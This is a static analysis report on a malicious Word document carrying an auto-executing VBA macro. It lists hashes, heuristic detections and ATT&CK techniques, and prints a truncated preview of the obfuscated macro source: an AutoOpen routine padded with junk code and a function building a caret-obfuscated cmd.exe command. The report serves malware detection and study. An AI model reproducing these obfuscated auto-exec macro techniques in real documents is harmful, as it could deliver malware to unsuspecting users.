Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d7610008f1f0825a…

MALICIOUS

Office (OLE)

268.5 KB Created: 2018-09-25 07:51:00 Authoring application: Microsoft Office Word First seen: 2018-10-19
MD5: 6178dc6d2ae04bda0f998dbca1564824 SHA-1: 55a31711c9849b8a72dc36e591734227707b7e79 SHA-256: d7610008f1f0825a0d6e0eba01ac358d9f553c19db572c42622b2c2e520331a9
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Word document (OLE/CFB container) carrying a VBA project. An AutoOpen procedure is present — Word runs a Sub with this name automatically when the document is opened — and the heuristics flag a Shell() call, indicating an attempt to execute arbitrary code. In the visible portion of the extracted source, AutoOpen fills several local arrays from Left/MidB/Right slices of variables that are never assigned (consistent with junk code used to defeat signature matching) and then makes a single call to an obfuscated helper, swiCqfBjh(), whose argument is assembled from KeyString() results, mcbUhiLkzvp() and further unassigned identifiers. The visible prefix of mcbUhiLkzvp() concatenates character codes that evaluate to "/" (Chr(47)) and '"' (Chr(34)) with caret-separated fragments such as "s^e^t", which is consistent with a caret-obfuscated cmd.exe command line (e.g. cmd /V:/C"set ..."), but the extracted source is truncated before the command is completed. The macro is therefore likely responsible for downloading and executing a second-stage payload; the final command line and any download URL could not be recovered from this report, and no literal Shell( token appears in the portion of the preview shown here, so the OLE_VBA_SHELL finding refers to code outside the visible excerpt.

Heuristics 6

  • ClamAV: Doc.Malware.00536d-6697203-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6697203-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note for this sample: the rule's "no modern VBA project was recovered" wording conflicts with the OLE_VBA_MACROS finding and with the 276 KB macros.bas extracted below; treat this finding as a generic rule description that co-fired on the AutoOpen name, not as evidence that the macro is WordBasic-only.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard Office Open XML DrawingML namespace identifier embedded in ordinary Word documents; it is not contacted over the network and should not be treated as a C2 or download indicator.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 276331 bytes
SHA-256: 70fbf46ee6a8f40c8ab42567e959c7fae2c7b01dd2d636de737ebab5d4d20994
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iULVCpNAj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-executing entry point: Word runs a Sub named AutoOpen when the
' document is opened (OLE_VBA_AUTOOPEN finding in the report above).
Sub AutoOpen()
' Every array below is filled from Left/MidB/Right slices of identifiers
' that are never assigned anywhere in the visible source and are never read
' again inside this Sub. NOTE(review): this looks like junk/padding code
' inserted to defeat signature matching — confirm against the full macros.bas.
   Dim fQcYPM(2)
fQcYPM(0) = Left(FWFCaa + qOtpTfkIDPztaVohIDbiY + aKHSVtDE, 297) + MidB(sIzfT + zvafBUCRdqOkZFZBU + voKzkp, 294, 185)
fQcYPM(1) = MidB(qVbJUuJ + TcaOBriHuGRQfbzDjimHA + KtbELQ, 203, 422) + Right(VaJGCifP + ZqzJiZKUjVajpjijpH + iiLLwi, 928)
   Dim VbDHI(2)
VbDHI(0) = MidB(rMZMLVvG + qwhBRMsCOuDkBnHBnX + iPrci, 193, 583) + Left(GiYinHDl + GBzocXIioFYfmlaNii + uzFdE, 304) + Right(PvIzE + OEABvPuwlljVdYiqDqWuY + kpcWp, 773) + MidB(LIhjc + PHrTfKardPOdksKtfFFb + NLSPbwFv, 64, 518)
VbDHI(1) = MidB(FMsJz + aatZSwFXPuKfvWSbKiJS + cHWzA, 422, 138) + Left(VXUlAQW + jIQkHjtCWfPQHTriZitnvw + wNHLoCml, 339)
   Dim znDGTl(2)
znDGTl(0) = MidB(FPBUKZ + nnUUnkvjuLqMBWwruW + CLdUjw, 855, 947) + MidB(AwwwY + DHZZZtatzzNfLORIJMA + zZoLfXEw, 826, 488)
znDGTl(1) = Right(CzcRXt + ujDIVnjiwFCHlcuvWvz + CPIOp, 828) + Mid(LCtNVj + nZiuUnHQcMczTBvGFiVp + mrFsO, 596, 470) + Left(iVRbo + sqNiKsBwAaaSjJki + XJzoX, 869) + MidB(dlHrwmi + zQwEuOEwrPlIrGUhQpm + VVOSi, 768, 507)
   Dim cDkTR(1)
cDkTR(0) = MidB(spfhJzMT + zWzRUhsQRYqUOZQqTHUKd + dqZiRZ, 690, 55) + Right(TEIVr + COBVRQXvdcrVXHEC + zzGRhO, 560)
   Dim RzrMR(2)
RzrMR(0) = MidB(IZfnPcP + iHzHNcvZEXqWpMEdzGowAJk + QXMqLj, 84, 609) + MidB(GoDRfN + lkTjOolppLwzcTJrhiq + oihpvpJ, 675, 139) + Left(ZBjIYEZr + SYdUcIVMIvwmHvqAfcr + tZcBTcE, 979) + Mid(WGDUS + NuODaPlYIjqjraaDfUBkDw + YdDaXT, 837, 281)
RzrMR(1) = Left(aTJqc + VImVvIuOBTMGzpMu + LXrcimZ, 146) + Mid(rzQioqEd + jJRXClzUUdiolJsQVimUMc + dSHljZOB, 51, 101) + MidB(smFlZLI + YCvLNzVoFupsWBOJakGjaRY + AuBTCO, 98, 296) + MidB(WZtGNz + AQDXrQzuRWVuoQuDbmdRmD + jjdsjA, 616, 463)
   Dim OkRzz(1)
OkRzz(0) = Right(sqDBVtUt + qRwMENriYAmPfRtGoUIqn + iamcAUSI, 956) + MidB(vJXdGPEu + YktPbmLhbJoFFGYfTG + jjjjL, 278, 880)
' The only statement in this Sub with a visible effect: a call to
' swiCqfBjh() (not defined in the visible excerpt) with one string argument
' built from two KeyString() calls, mcbUhiLkzvp() (a Function defined in the
' next module) and a run of otherwise-unassigned identifiers. The integer
' sums inside the KeyString() arguments (10+8+3+12+34 = 67, 11+10+4+14+38 = 77)
' follow the same split-constant pattern as the Chr() sums in mcbUhiLkzvp();
' whether KeyString() maps them to characters cannot be confirmed from here.
' NOTE(review): no literal Shell( token appears in this excerpt — the
' OLE_VBA_SHELL finding must come from code beyond the preview or inside
' swiCqfBjh(); confirm against the full extracted source before attributing
' the command line.
swiCqfBjh (KeyString(owTuRWl + BhYvR + 10 + 8 + 3 + 12 + 34 + MBBjjKf + fWNJjX) + wUfMuOI + HskKjtf + KeyString(uGLwdS + mzXATdH + 11 + 10 + 4 + 14 + 38 + zBOSmsiA + pGvcinP) + mcbUhiLkzvp + UlXEPWHM + LFLGvVI + BMQfhJoT + LLAzPC + ToRwRGcqdN + Dkrzimi + bHUYprjjC + jUKWa + qAEBiwdG + AFsiUGmEVQ + wpQjilZVz + hiVHPYFCp + uDuiGKqp + GzoujqsArY + HbXwTL + vujzlulQMhH + icNww + YKqsNZ + DQhiG)
' More junk array fills after the call; same pattern as above, never read.
   Dim fVMDLu(1)
fVMDLu(0) = MidB(cVjUunz + LMEZwlXUJBofdTOzriCbrW + znXIO, 330, 956) + Right(nWjkpj + MrwsMGiAbMIkMaahI + XijuatzP, 39) + MidB(rffqTk + zOplooaTJOBWkZLSfkLl + kthXVH, 809, 6) + Right(YhwsG + cFntBGFcHSBIQUDutww + BHjAmR, 370)
   Dim GjnPEL(1)
GjnPEL(0) = MidB(psEMdfH + dzsGPZvlRjmiMWPP + svNYjAz, 194, 852) + Left(wCKYQ + KbTTuNuAazHQsfpihfYL + ziomzFwi, 462) + Mid(KZBzdi + KlBJSNWlGLmPujFOhUD + oOfLAiDw, 114, 730) + Mid(zUWZZ + cMSBbGQYUkFGMDiOWGC + dHSwOjo, 151, 723)
   Dim PAIjPm(2)
PAIjPm(0) = Right(bKfrDAqn + WjTWMtzNCRbBcfNkFifEUP + iiFNdsS, 686) + Right(soPhRY + zICMMECjmrcwHQTHpo + tGQCZVY, 243)
PAIjPm(1) = MidB(wPZiWRA + IfsvblJQwQckJFvBDh + kqBsEh, 895, 26) + Left(NbDAL + QRHOqJzAVQVtzGIFZs + WzJXWo, 420)
End Sub


Attribute VB_Name = "KijmWjmbLtz"
Function mcbUhiLkzvp()
KipaNFsin = "d " + CStr(Chr(2 + 8 + 2 + 6 + 29)) + "V" + ":" + CStr(Chr(2 + 8 + 2 + 6 + 29)) + "C" + CStr(Chr(1 + 5 + 1 + 4 + 23)) + "s" + "^" + "e^" + "t " + ";" + "^$" + "="
HQTnNGA = "^3" + "0" + "1^" + " ^" + "30" + "9" + "^" + " " + "^" + "0^" + "5" + "1"
ASDTnDDVH = "^ " + "5" + "^1" + "9" + " " + "^5" + "91" + "^ " + "^1"
Dim ifVPwB(2)
ifVPwB(0) = MidB(OsoIn + oiaYtlBZEcwzjpkcA + sNWjS, 651, 544) + Right(SwCJc + FjwdvKqSGPJzdifpN + tDZdz, 195)
ifVPwB(1) = Right(nWjUftD + itfNMSwhISTiStqtDSL + kTsZisR, 504) + Right(HUWwhk + RBwPJjzlCKvuEdsatRo + jMfRvuJJ, 943) + Left(HiUJIbcG + oWlkSVJNOdLEfwHrtAwIc + IiSRph, 535) + MidB(puhdYUzj + wapNEwPVPpOIMFrwZwjc + JwiSZ, 25, 285)
   Dim RqMtn(1)
RqMtn(0) = Right(YJkBqtNf + XuSuzjXOOdWVmDUwOzUc + HZEbPR, 910) + Left(FwdaTHpD + VBnwwWiAZnDSYVpOwziGi + rltpZ, 909)
   D
... (truncated)